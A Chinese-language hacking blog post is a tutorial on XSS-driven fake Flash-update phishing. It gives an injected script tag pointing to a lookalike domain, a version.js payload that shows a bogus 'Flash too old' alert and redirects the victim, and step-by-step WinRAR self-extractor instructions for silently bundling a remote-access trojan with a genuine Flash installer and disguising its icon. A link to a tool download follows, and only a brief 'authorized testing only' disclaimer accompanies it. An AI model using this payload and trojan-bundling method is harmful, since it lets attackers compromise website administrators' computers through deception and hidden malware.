Xss之Flash钓鱼

相信很多朋友都看过Xss 弹出Flash更新进行钓鱼的文章

但大多文章都是一句话概括,故此写一篇关于这方面的文章


剧情:某日xxx黑客,发现某网站存在Xss漏洞,但是有httponly,xxx黑客就想利用Xss进行钓鱼,如果只是钓到账号密码,可以去伪造登录页面,提示登录超时,这里以拿到权限为主。


先说一下Flash源码(末尾有相关工具+源码下载地址)

我已经修改为和官方一模一样,包括英文界面(左边官方页面,右边伪造页面)

你只需要修改木马下载地址即可

这个时候xxx黑客已经伪造好了钓鱼页面,并且购买了个flash相似的域名 — fiash.cn

紧接着黑客xxx把下面代码,插入到留言框

<script src="http://www.fiash.cn/version.js"></script>

vesrion.js:

window.alert = function(name){
var iframe = document. createElement("IFRAME");
iframe.style.display="none";
iframe.setAttribute("src",'data:text/plain,');
document. documentElement.appendChild(iframe);
window.frames [0].window.alert(name);
iframe.parentNode.removeChild(iframe);
}
alert( "您的FLASH版本过低,尝试升级后访问该页面! ");
window. location.href="http://www.hackxc.cc";

管理员日常查看留言,提示Flash页面版本过低,会跳转倒

黑客xxx已经提前捆绑好木马,可正常安装Flash以及运行木马


下面解析木马绑定思路:

1.首选生成一个远控马,和正常的flash文件

2.接着利用WinRAR压缩文件添加压缩文件,后缀改为exe

3.高级——>自解压选项——>解压路径:C:\windows\temp

4.高级——>自解压选项——>安装——>解压后运行

C:\windows\temp\qq.exe
C:\windows\temp\flashplayer_install_cn.exe

5.高级——>自解压选项——>模式——>隐藏所有

6.高级——>自解压选项——>更新

                                    更新方式——>解压并更新文件
                                    覆盖方式——>覆盖所有文件

7.保存后,生成exe,点击后会解压文件,然后执行

8.由于还不太像,我们需要修改文件的图标,属性等等,高仿flash
利用工具:ResourceHacker,在此就不介绍如何替换图标了

9.替换图标后运行文件,自动解压并且运行,


回到剧情,此时管理员已经上线,这个时候我们就可以把version.js改一个名称,这样网站就无法加载了至此已经拿到管理员PC权限,此方法适用于已授权的渗透测试、红队评估、攻防演练,请勿用于其他非法途径。


最后为了确保上线几率,可以再写个txt放进去进行欺骗  哈哈



下载地址:https://github.com/hackxc/xss_flash

本博客所有文章如无特别注明均为原创。作者:小陈复制或转载请以超链接形式注明转自 小陈's Blog - 致力关注于黑客技术、渗透测试、网络信息安全
原文地址《Xss之Flash钓鱼
分享到:更多

相关推荐

发表评论

路人甲 表情
看不清楚?点图切换 Ctrl+Enter快速提交

网友评论(0)